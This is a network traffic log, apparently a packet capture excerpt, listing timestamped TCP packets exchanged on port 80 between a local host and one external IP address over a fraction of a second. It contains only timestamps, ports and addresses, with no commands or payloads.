Dec 14, 2024 23:58:10.983789921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.983841896 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.986665010 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.986718893 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.986794949 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.986849070 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.989689112 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.989743948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.989835978 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.989881992 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.992672920 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.992723942 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.992815971 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.992863894 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.995692968 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.995747089 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.995821953 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.995873928 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.998707056 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.998761892 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.998852015 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.998899937 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.001728058 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.001780033 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.001858950 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.001910925 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.004781961 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.004847050 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.004899025 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.004954100 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.007734060 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.007807970 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.007890940 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.007945061 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.010760069 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.010821104 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.010878086 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.010930061 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.013784885 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.013838053 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.013919115 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.013967037 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.016855955 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.016916037 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.016925097 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.016974926 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.019819021 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.019892931 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.019984961 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.022831917 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.022893906 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.022947073 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.023004055 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.025821924 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.025880098 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.025969982 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.026020050 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.028984070 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.029016972 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.029031992 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.029062033 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.031872988 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.031929016 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.031970978 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.032026052 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.034888983 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.034939051 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.034986973 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.035034895 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.037910938 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.037964106 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.038019896 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.038074017 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.040884972 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.040931940 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.040978909 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.041023016 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.043853998 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.043905973 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.043986082 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.044030905 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.046916962 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.046967030 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.047004938 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.047048092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.049875975 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.049926043 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.050012112 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.050055027 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.052910089 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.052958012 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.053039074 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.053082943 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.055898905 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.055948973 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.056024075 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.056067944 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.058913946 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.058963060 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.163475037 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.163536072 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.163600922 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.163651943 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.164756060 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.164807081 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.164868116 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.164915085 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.167359114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.167418957 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.167516947 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.167562962 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.169987917 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.170043945 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.170099020 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.170149088 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.172744036 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.172796011 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.172864914 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.172911882 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.175017118 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.175088882 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.175127983 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.175194979 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.177436113 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.177479982 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.177546978 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.177594900 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.179857969 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.179913044 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.179975986 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.180026054 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.182257891 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.182307959 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.182399035 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.182459116 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.184613943 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.184662104 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.184737921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.184787989 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.186961889 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.187007904 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.187078953 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.187124968 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.189359903 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.189408064 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.189451933 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.189498901 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.191626072 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.191674948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.191757917 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.191802979 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.194005966 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.194061995 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.194149971 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.194196939 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.196333885 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.196381092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.196449041 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.196496010 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.198678970 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.198731899 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.198805094 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.198853016 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.201153040 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.201200008 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.201239109 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.201289892 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.203385115 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.203434944 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.203510046 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.203555107 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.205705881 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.205754995 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.205843925 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.205889940 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.208066940 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.208113909 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.208174944 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.208220959 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.210437059 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.210481882 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.210526943 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.210577011 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.212778091 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.212836981 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.212871075 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.212903976 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.215147972 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.215193033 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.215228081 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.215265036 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.217474937 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.217521906 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.217600107 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.217641115 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.219789028 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.219850063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.219918013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.219965935 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.222132921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.222203016 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.222470999 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.222526073 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.224523067 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.224579096 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.224617004 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.224666119 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.226800919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.226854086 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.226924896 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.226974010 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.229178905 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.229227066 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.229289055 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.229330063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.231513023 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.231556892 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.231676102 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.231722116 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.233850002 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.233900070 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.233977079 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.234020948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.236203909 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.236248016 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.236294031 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.236336946 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.238533974 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.238578081 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.238663912 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.238709927 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.240904093 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.240945101 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.241012096 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.241055965 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.243238926 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.243283033 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.243350029 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.243453026 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.245560884 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.245614052 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.245687962 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.245731115 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.247955084 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.247997999 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.248035908 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.248076916 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.250379086 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.250420094 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.250436068 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.250483036 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.252594948 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.252638102 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.252707958 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.252748966 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.254941940 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.254987955 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.255059958 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.255104065 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.257308960 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.257361889 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.257400990 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.257445097 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.259682894 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.259721994 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.259818077 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.259871960 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.262012005 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.262057066 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.262193918 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.262238979 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.264312029 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.264358997 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.264436960 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.264482975 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.266670942 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.266715050 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.266782045 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.266825914 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.269011974 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.269068956 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.269155979 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.269201040 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.271486998 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.271526098 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.271533966 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.271563053 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.273751020 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.273792982 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.273823977 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.273869038 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.276051998 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.276098013 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.276175022 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.276215076 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.278393030 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.278439045 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.278512955 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.278556108 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.280725956 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.280766010 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.280797005 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.280842066 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.355690002 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.355739117 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.355782986 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.355823994 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.356616974 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.356659889 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.356982946 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.357022047 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.357115030 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.357160091 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.358974934 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.359033108 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.359066963 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.359111071 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.360965967 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.361007929 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.361058950 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.361102104 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.362895966 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.362946033 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.363004923 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.363048077 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.364815950 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.364859104 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.364912033 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.364948034 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.366720915 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.366767883 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.366791964 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.366843939 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.368542910 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.368590117 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.368643999 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.368685007 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.370371103 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.370429039 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.370476007 CET	80	49770	31.41.244.11	192.168.2.4
